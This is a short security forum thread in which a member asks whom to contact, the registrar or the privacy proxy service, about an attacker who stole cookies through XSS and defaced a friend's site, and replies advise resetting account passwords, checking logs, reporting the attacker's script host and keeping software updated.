Results 1 to 3 of 3

Thread: Reporting XSS attacks

  1. #1
    Senior Member
    Join Date
    Dec 2004
    Posts
    320

    Reporting XSS attacks

    Hey all, long time no see. Just stoppin in to ask a quick question.

    Recently a friend of mine's website was hit with a successful XSS cookie theft. He did the usual thing those 1337 h4xZ0rZ like to do. (deface the site, change everyone's password etc.) Now, I have a pretty good idea of where he had his cookie catcher (or whatever you want to call it), the cgi script that handles of the incoming +document.cookie information. Problem is he registered with GodDaddy.com but used domainsbyproxy.com as his registrant information. So, My question is; Who should I get in contact with ? Would it be the registrar or the domainsbyproxy guys ? Thanks in advance.
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare

  2. #2
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391
    Just do a password reset on the hosting server, and with the domain register.
    hopefully the email addresse secret question etc has not yet been changed by the attacker.

    If they just happened to get lucky with the xss and decided to be a pain that would explain the password's changed.

    Hopefully they arn't smart enough to have worked out that they should also change the registrant email addresse etc with the hosting account and domain name account.

    Also if your friend wanted to know where the cookie script was located then just get them to check there logs, and they should see a remote website.
    Then once he has worked out where the script was held, just make reports to the needed people and have he's website etc closed down.

  3. #3
    Senior Member
    Join Date
    Oct 2003
    Location
    MA
    Posts
    1,052
    Make sure he uses software that is updated and http://www.nullcube.com/software/cub.../subs/xss.html

Similar Threads

  1. More Security Attacks Motivated By Greed, Symantec Reports
    By MrLinus in forum Miscellaneous Security Discussions
    Replies: 2
    Last Post: September 28th, 2004, 08:08 PM
  2. A look into IDS/Snort Whole thing by QoD
    By qod in forum The Security Tutorials Forum
    Replies: 6
    Last Post: February 27th, 2004, 03:03 AM
  3. A look into IDS/Snort part 1 of 3
    By qod in forum The Security Tutorials Forum
    Replies: 18
    Last Post: January 5th, 2004, 02:30 PM
  4. Understanding DoS
    By NullDevice in forum The Security Tutorials Forum
    Replies: 21
    Last Post: December 17th, 2003, 10:03 PM
  5. Classic Social Engineering Attacks
    By Striek in forum The Security Tutorials Forum
    Replies: 10
    Last Post: December 16th, 2003, 09:30 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •